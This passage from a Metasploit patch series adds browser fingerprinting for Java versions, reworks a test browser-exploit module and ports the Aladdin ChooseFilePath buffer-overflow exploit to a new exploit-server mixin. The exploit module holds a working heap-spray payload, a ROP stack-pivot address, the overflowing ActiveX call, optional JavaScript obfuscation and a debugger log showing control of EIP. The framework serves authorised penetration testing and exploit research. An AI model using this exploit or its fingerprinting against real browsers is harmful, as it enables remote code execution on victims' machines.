+++ b/spec/lib/rex/exploitation/js/detect_spec.rb
@@ -5,16 +5,23 @@ describe Rex::Exploitation::Js::Detect do
   context "Class methods" do
 
     context ".os" do
-      it "should load the OS Detect javascript" do
+      it "should load the OS detection in Javascript" do
         js = Rex::Exploitation::Js::Detect.os.to_s
         js.should =~ /window\.os_detect/
       end
     end
 
     context ".ie_addons" do
-      it "should load the IE Addons Detect javascript" do
+      it "should load the IE Addons detection in Javascript" do
         js = Rex::Exploitation::Js::Detect.ie_addons.to_s
-        js.should =~ /window\.addons_detect/
+        js.should =~ /window\.ie_addons_detect/
+      end
+    end
+
+    context ".misc_addons" do
+      it "should load the misc Addons detection in Javascript" do
+        js = Rex::Exploitation::Js::Detect.misc_addons.to_s
+        js.should =~ /window\.misc_addons_detect/
       end
     end
 
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 0f4ad1771a..204bcbfb42 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -29,43 +29,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source => /script|headers/i,
-          :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method => "LoadMovie",
-          :os_name => /win/i
+          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
+          #:method => "LoadMovie",
+          #:os_name => /win/i
         },
       'Targets'        =>
         [
-          [ 'Automatic', {} ],
-          [
-            'Windows XP with IE 8',
-            {
-              'os_flavor' => 'XP',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '8.0',
-              'Rop'       => true,
-              'Offset'    => 0x100
-            }
-          ],
-          [
-            'Windows 7 with IE 9',
-            {
-              'os_flavor' => '7',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '9.0',
-              'Rop'       => true,
-              'Offset'    => 0x100
-            }
-          ],
-          [
-            'Windows 7 with IE 10',
-            {
-              'os_flavor' => '7',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '10.0',
-              'Rop'       => true,
-              'Offset'    => 0x100
-            }
-          ]
+          [ 'Automatic', {} ]
         ],
 
       'Payload'        =>
@@ -95,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
     Flavor: #{target_info[:os_flavor]}<br>
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
+    Java version: #{target_info[:java]}<br>
     Office version: #{target_info[:office]}
     |
 
@@ -114,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
     Flavor: #{target_info[:os_flavor]}<br>
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
+    Java version: #{target_info[:java]}<br>
     Office version: #{target_info[:office]}
     |
   end

From b34b4ac2b60926d0ad754e0ef6d68be9cc5b06e2 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 00:57:20 -0600
Subject: [PATCH 62/73] Update the java stuff again

---
 data/js/detect/misc_addons.js                 | 64 +++++++++++++++++++
 .../exploits/test/browserexploitserver.rb     | 63 +++++-------------
 2 files changed, 80 insertions(+), 47 deletions(-)
 create mode 100644 data/js/detect/misc_addons.js

diff --git a/data/js/detect/misc_addons.js b/data/js/detect/misc_addons.js
new file mode 100644
index 0000000000..434a145791
--- /dev/null
+++ b/data/js/detect/misc_addons.js
@@ -0,0 +1,64 @@
+window.misc_addons_detect = { };
+
+/**
+ * Returns the Java version
+ **/
+window.misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
\ No newline at end of file
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 204bcbfb42..480997e2fd 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -26,18 +26,24 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://metasploit.com' ]
         ],
       'Platform'       => 'win',
-      'BrowserRequirements' =>
+      'Requirements' =>
         {
           :source => /script|headers/i,
-          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
-          #:method => "LoadMovie",
-          #:os_name => /win/i
+          :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          :method => "LoadMovie",
+          :os_name => /win/i
         },
       'Targets'        =>
         [
-          [ 'Automatic', {} ]
+          [ 'Automatic', {} ],
+          [ 'Windows XP with IE 8',
+            {
+              'Requirements' => { :os_flavor => 'XP', :ua_name => 'MSIE', :ua_ver => '8.0' },
+              'Rop'          => true,
+              'Offset'       => 0x100
+            }
+          ]
         ],
-
       'Payload'        =>
         {
           'BadChars'        => "\x00",  #Our spray doesn't like null bytes
@@ -48,63 +54,26 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  #
-  # This example shows how to use ERB and being able to use the arguments and local vars
-  #
-  def exploit_template1(target_info, txt)
-    txt2 = "I can use local vars!"
-
-    template = %Q|
-    <% msg = "This page is generated by an exploit" %>
-    <%=msg%><br>
-    <%=txt%><br>
-    <%=txt2%><br>
-    <p></p>
-    Data gathered from source: #{target_info[:source]}<br>
-    OS name: #{target_info[:os_name]}<br>
-    Flavor: #{target_info[:os_flavor]}<br>
-    UA name: #{target_info[:ua_name]}<br>
-    UA version: #{target_info[:ua_ver]}<br>
-    Java version: #{target_info[:java]}<br>
-    Office version: #{target_info[:office]}
-    |
-
-    return template, binding()
-  end
-
-  #
-  # This example shows how to generate an ERB template without passing binding
-  #
-  def exploit_template2(target_info)
+  def exploit_template(target_info)
+    #print_debug(get_target.inspect)
     %Q|
     <% msg = "This page is generated by an exploit" %>
-    <%=msg%><br>
+    <%=msg%>
     <p></p>
     Data gathered from source: #{target_info[:source]}<br>
     OS name: #{target_info[:os_name]}<br>
     Flavor: #{target_info[:os_flavor]}<br>
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
-    Java version: #{target_info[:java]}<br>
     Office version: #{target_info[:office]}
     |
   end
 
   def on_request_exploit(cli, request, target_info)
-    print_debug("Target selected: #{get_target.name}")
-    print_line(Rex::Text.to_hex_dump([rop_junk].pack("V*")))
-    print_line(Rex::Text.to_hex_dump([rop_nop].pack("V*")))
     p = get_payload(cli, target_info)
     vprint_line(Rex::Text.to_hex_dump(p))
     print_status("Sending exploit HTML...")
-
-    # Randomly pick a template to test
-    if [true, false].sample
-      txt = "I can pass more args"
-      send_exploit_html(cli, exploit_template1(target_info, txt))
-    else
-      send_exploit_html(cli, exploit_template2(target_info))
-    end
+    send_exploit_html(cli, exploit_template(target_info))
   end
 
   def exploit

From d9d04fa3a30b91f1396139f04407620bf2e8a2b0 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 00:59:00 -0600
Subject: [PATCH 63/73] Correct test file

---
 .../exploits/test/browserexploitserver.rb     | 85 ++++++++++++++++---
 1 file changed, 73 insertions(+), 12 deletions(-)

diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 480997e2fd..eecc454d02 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -26,24 +26,48 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://metasploit.com' ]
         ],
       'Platform'       => 'win',
-      'Requirements' =>
+      'BrowserRequirements' =>
         {
           :source => /script|headers/i,
-          :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method => "LoadMovie",
+          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
+          #:method => "LoadMovie",
           :os_name => /win/i
         },
       'Targets'        =>
         [
           [ 'Automatic', {} ],
-          [ 'Windows XP with IE 8',
+          [
+            'Windows XP with IE 8',
             {
-              'Requirements' => { :os_flavor => 'XP', :ua_name => 'MSIE', :ua_ver => '8.0' },
-              'Rop'          => true,
-              'Offset'       => 0x100
+              'os_flavor' => 'XP',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '8.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
+            }
+          ],
+          [
+            'Windows 7 with IE 9',
+            {
+              'os_flavor' => '7',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '9.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
+            }
+          ],
+          [
+            'Windows 7 with IE 10',
+            {
+              'os_flavor' => '7',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '10.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
             }
           ]
         ],
+
       'Payload'        =>
         {
           'BadChars'        => "\x00",  #Our spray doesn't like null bytes
@@ -54,26 +78,63 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  def exploit_template(target_info)
-    #print_debug(get_target.inspect)
-    %Q|
+  #
+  # This example shows how to use ERB and being able to use the arguments and local vars
+  #
+  def exploit_template1(target_info, txt)
+    txt2 = "I can use local vars!"
+
+    template = %Q|
     <% msg = "This page is generated by an exploit" %>
-    <%=msg%>
+    <%=msg%><br>
+    <%=txt%><br>
+    <%=txt2%><br>
     <p></p>
     Data gathered from source: #{target_info[:source]}<br>
     OS name: #{target_info[:os_name]}<br>
     Flavor: #{target_info[:os_flavor]}<br>
     UA name: #{target_info[:ua_name]}<br>
     UA version: #{target_info[:ua_ver]}<br>
+    Java version: #{target_info[:java]}<br>
+    Office version: #{target_info[:office]}
+    |
+
+    return template, binding()
+  end
+
+  #
+  # This example shows how to generate an ERB template without passing binding
+  #
+  def exploit_template2(target_info)
+    %Q|
+    <% msg = "This page is generated by an exploit" %>
+    <%=msg%><br>
+    <p></p>
+    Data gathered from source: #{target_info[:source]}<br>
+    OS name: #{target_info[:os_name]}<br>
+    Flavor: #{target_info[:os_flavor]}<br>
+    UA name: #{target_info[:ua_name]}<br>
+    UA version: #{target_info[:ua_ver]}<br>
+    Java version: #{target_info[:java]}<br>
     Office version: #{target_info[:office]}
     |
   end
 
   def on_request_exploit(cli, request, target_info)
+    print_debug("Target selected: #{get_target.name}")
+    print_line(Rex::Text.to_hex_dump([rop_junk].pack("V*")))
+    print_line(Rex::Text.to_hex_dump([rop_nop].pack("V*")))
     p = get_payload(cli, target_info)
     vprint_line(Rex::Text.to_hex_dump(p))
     print_status("Sending exploit HTML...")
-    send_exploit_html(cli, exploit_template(target_info))
+
+    # Randomly pick a template to test
+    if [true, false].sample
+      txt = "I can pass more args"
+      send_exploit_html(cli, exploit_template1(target_info, txt))
+    else
+      send_exploit_html(cli, exploit_template2(target_info))
+    end
   end
 
   def exploit

From 32b12609bdb1ece1ae96b4de8890218397796ea8 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 16:50:58 -0600
Subject: [PATCH 64/73] Forgot to pass optional headers

---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 299eda7d09..09f013d3c8 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -483,7 +483,7 @@ module Msf
       else
         html = ERB.new(template).result
       end
-      send_response(cli, html)
+      send_response(cli, html, headers)
     end
 
     #

From 866f2403374ff93d43d48cdbd621e26e5b2c9343 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 17:06:43 -0600
Subject: [PATCH 65/73] A little update on documentation

---
 lib/msf/core/exploit/browser/server.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 09f013d3c8..72626f336a 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -206,6 +206,7 @@ module Msf
     # If the source is 'script', the profile might have even more information about plugins:
     # 'office'  : The version of Microsoft Office (IE only)
     # 'activex' : Whether a specific method is available from an ActiveX control (IE only)
+    # 'java'    : The Java version
     #
     # @param tag [String] Either a cookie or IP + User-Agent
     # @return [Hash] The profile found. If not found, returns nil

From 6a840fc1694d44b40dfbdc685765121cad583afb Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 11 Nov 2013 12:41:03 -0600
Subject: [PATCH 66/73] Move file to get a matching name

---
 lib/msf/core/exploit/mixins.rb                     | 2 +-
 lib/msf/core/exploit/{browser => remote}/server.rb | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename lib/msf/core/exploit/{browser => remote}/server.rb (100%)

diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 2b15219913..b5f9595829 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -98,4 +98,4 @@ require 'msf/core/exploit/winrm'
 # WebApp
 require 'msf/core/exploit/web'
 
-require 'msf/core/exploit/browser/server'
+require 'msf/core/exploit/remote/server'
diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/remote/server.rb
similarity index 100%
rename from lib/msf/core/exploit/browser/server.rb
rename to lib/msf/core/exploit/remote/server.rb

From 85150823cd0013ed4836ef21ffff38a8f1e1948d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 11 Nov 2013 15:44:27 -0600
Subject: [PATCH 67/73] rename again

---
 lib/msf/core/exploit/mixins.rb                                  | 2 +-
 .../core/exploit/remote/{server.rb => browser_exploit_server}   | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename lib/msf/core/exploit/remote/{server.rb => browser_exploit_server} (100%)

diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index b5f9595829..1da0a5a5a1 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -98,4 +98,4 @@ require 'msf/core/exploit/winrm'
 # WebApp
 require 'msf/core/exploit/web'
 
-require 'msf/core/exploit/remote/server'
+require 'msf/core/exploit/remote/browser_exploit_server'
diff --git a/lib/msf/core/exploit/remote/server.rb b/lib/msf/core/exploit/remote/browser_exploit_server
similarity index 100%
rename from lib/msf/core/exploit/remote/server.rb
rename to lib/msf/core/exploit/remote/browser_exploit_server

From cf8f2940b05284f475b8129273e7a405ee4f8105 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 11 Nov 2013 15:45:11 -0600
Subject: [PATCH 68/73] Oops, this is the right filename

---
 .../remote/{browser_exploit_server => browser_exploit_server.rb}  | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename lib/msf/core/exploit/remote/{browser_exploit_server => browser_exploit_server.rb} (100%)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server b/lib/msf/core/exploit/remote/browser_exploit_server.rb
similarity index 100%
rename from lib/msf/core/exploit/remote/browser_exploit_server
rename to lib/msf/core/exploit/remote/browser_exploit_server.rb

From 922f0eb900681dbeb52b64bd417784bf8449e69f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 Nov 2013 17:01:09 -0600
Subject: [PATCH 69/73] Switch aladdin_choosefilepath_bof2 to use
 BrowserExploitServer

---
 .../browser/aladdin_choosefilepath_bof.rb     | 200 ++++++------------
 1 file changed, 65 insertions(+), 135 deletions(-)

diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index 8cae347ac9..6929802448 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -8,21 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::Remote::BrowserAutopwn
-  include Msf::Exploit::RopDb
-
-  autopwn_info({
-    :ua_name    => HttpClients::IE,
-    :ua_minver  => "6.0",
-    :ua_maxver  => "8.0",
-    :javascript => true,
-    :os_name    => OperatingSystems::WINDOWS,
-    :rank       => Rank,
-    :classid    => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
-    :method     => "ChooseFilePath",
-  })
-
+  include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
     super(update_info(info,
@@ -56,80 +42,72 @@ class Metasploit3 < Msf::Exploit::Remote
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source => /script|headers/i,
+          :clsid  => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
+          :method => "ChooseFilePath",
+          :os_name => /win/i
+        },
       'Targets'        =>
         [
           [ 'Automatic', {} ],
-          [ 'IE 6 on Windows XP SP3',
-            {
-              'Rop' => false,
-              'Offset' => '0x5F4',
-              'Ret' => 0x0c0c0c0c
-            }
+          [
+            'Windows XP with IE 6',
+              {
+                'os_flavor' => 'XP',
+                'ua_name'   => 'MSIE',
+                'ua_ver'    => '6.0',
+                'Rop'       => false,
+                'Offset' => '0x5F4',
+                'Ret' => 0x0c0c0c0c
+              }
           ],
-          [ 'IE 7 on Windows XP SP3',
-            {
-              'Rop' => false,
-              'Offset' => '0x5F4',
-              'Ret' => 0x0c0c0c0c
-            }
+          [
+            'Windows XP with IE 7',
+              {
+                'os_flavor' => 'XP',
+                'ua_name'   => 'MSIE',
+                'ua_ver'    => '7.0',
+                'Rop'       => false,
+                'Offset' => '0x5F4',
+                'Ret' => 0x0c0c0c0c
+              }
           ],
-          [ 'IE 8 on Windows XP SP3',
-            {
-              'Rop' => true,
-              'Offset' => '0x5f6',
-              'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
-            }
+          [
+            'Windows XP with IE 8',
+              {
+                'os_flavor' => 'XP',
+                'ua_name'   => 'MSIE',
+                'ua_ver'    => '8.0',
+                'Rop'       => true,
+                'Offset' => '0x5f6',
+                'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
+              }
           ],
-          [ 'IE 7 on Windows Vista',
-            {
-              'Rop' => false,
-              'Offset' => '0x5F4',
-              'Ret' => 0x0c0c0c0c
-            }
+          [
+            'Windows Vista with IE 7',
+              {
+                'os_flavor' => 'Vista',
+                'ua_name'   => 'MSIE',
+                'ua_ver'    => '7.0',
+                'Rop'       => false,
+                'Offset' => '0x5F4',
+                'Ret' => 0x0c0c0c0c
+              }
           ]
+
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Apr 1 2012",
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
-  def get_target(agent)
-    #If the user is already specified by the user, we'll just use that
-    return target if target.name != 'Automatic'
 
-    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-
-    ie_name = "IE #{ie}"
-
-    case nt
-    when '5.1'
-      os_name = 'Windows XP SP3'
-    when '6.0'
-      os_name = 'Windows Vista'
-    when '6.1'
-      os_name = 'Windows 7'
-    end
-
-    targets.each do |t|
-      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-        print_status("Target selected as: #{t.name}")
-        return t
-      end
-    end
-
-    return nil
-  end
-
-  def ie_heap_spray(my_target, p)
-    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
-    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+  def ie_heap_spray(p)
+    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
+    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
 
     # Land the payload at 0x0c0c0c0c
 
@@ -138,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
     var code = unescape("#{js_code}");
     var nops = unescape("#{js_nops}");
     while (nops.length < 0x80000) nops += nops;
-    var offset = nops.substring(0, #{my_target['Offset']});
+    var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
     while (shellcode.length < 0x40000) shellcode += shellcode;
     var block = shellcode.substring(0, (0x80000-6)/2);
@@ -149,87 +127,39 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
-
     return js
   end
 
-  def load_exploit_html(my_target, cli)
+  def exploit_template(cli, target_info)
 
-    if my_target['Rop']
-      p = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
+    if get_target['Rop']
+      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
     else
-      p = payload.encoded
+      p = get_payload(cli, target_info)
     end
 
-    spray = ie_heap_spray(my_target, p)
+    spray = ie_heap_spray(p)
+    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))
 
-    html = %Q|
+    html_template = %Q|
     <html>
     <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
     <script>
-    #{spray}
-
+    <%=spray%>
     junk='';
     for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
-    pwnd.ChooseFilePath(junk + "#{Rex::Text.to_hex([my_target.ret].pack("V"))}");
+    pwnd.ChooseFilePath(junk + "<%=target_ret%>");
     </script>
     </html>
     |
 
-    return html
+    return html_template, binding()
   end
 
-  def on_request_uri(cli, request)
-    agent = request.headers['User-Agent']
-    uri   = request.uri
-    print_status("Requesting: #{uri}")
-
-    my_target = get_target(agent)
-    # Avoid the attack if no suitable target found
-    if my_target.nil?
-      print_error("Browser not supported, sending 404: #{agent}")
-      send_not_found(cli)
-      return
-    end
-
-    html = load_exploit_html(my_target, cli)
-    html = html.gsub(/^\t\t/, '')
+  def on_request_exploit(cli, request, target_info)
     print_status("Sending HTML...")
-    send_response(cli, html, {'Content-Type'=>'text/html'})
+    send_exploit_html(cli, exploit_template(cli, target_info))
   end
 
 end
 
-=begin
-0:008> g
-(82c.12dc): Access violation - code c0000005 (first chance)
-First chance exceptions are reported before any exception handling.
-This exception may be expected and handled.
-eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
-eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0         nv up ei pl zr na pe nc
-cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
-OLEAUT32!SysReAllocStringLen+0x31:
-7712a41a 8b00            mov     eax,dword ptr [eax]  ds:0023:0c0c0c0c=????????
-0:008> g
-(82c.12dc): Access violation - code c0000005 (first chance)
-First chance exceptions are reported before any exception handling.
-This exception may be expected and handled.
-eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
-eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0         nv up ei pl zr na pe nc
-cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
-0c0c0c0c ??              ???
-0:008> db 020bf798
-020bf798  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7a8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7b8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7c8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7d8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7e8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf7f8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-020bf808  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
-=end
\ No newline at end of file

From 30de61168d9cfe014670dbc696f6d4181ec0dfbe Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 Nov 2013 17:05:54 -0600
Subject: [PATCH 70/73] Support heap spray obfuscation

---
 .../windows/browser/aladdin_choosefilepath_bof.rb     | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index 6929802448..ecf27f5472 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -102,6 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Apr 1 2012",
       'DefaultTarget'  => 0))
 
+    register_options(
+      [
+        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+      ], self.class
+    )
   end
 
 
@@ -127,6 +132,12 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
+
+    if datastore['OBFUSCATE']
+      js = ::Rex::Exploitation::JSObfu.new(js)
+      js.obfuscate
+    end
+
     return js
   end
 

From b01d8c50e04bfbdf92989514cc6b270c8485bf67 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 Nov 2013 17:09:41 -0600
Subject: [PATCH 71/73] Restore module crash documentation

---
 .../browser/aladdin_choosefilepath_bof.rb     | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index ecf27f5472..433d73d80e 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -174,3 +174,31 @@ class Metasploit3 < Msf::Exploit::Remote
 
 end
 
+=begin
+0:008> g
+(82c.12dc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
+eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+OLEAUT32!SysReAllocStringLen+0x31:
+7712a41a 8b00            mov     eax,dword ptr [eax]  ds:0023:0c0c0c0c=????????
+0:008> g
+(82c.12dc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
+eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+0c0c0c0c ??              ???
+0:008> db 020bf798
+020bf798  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf7a8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf7b8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf7c8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
+020bf7d8  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
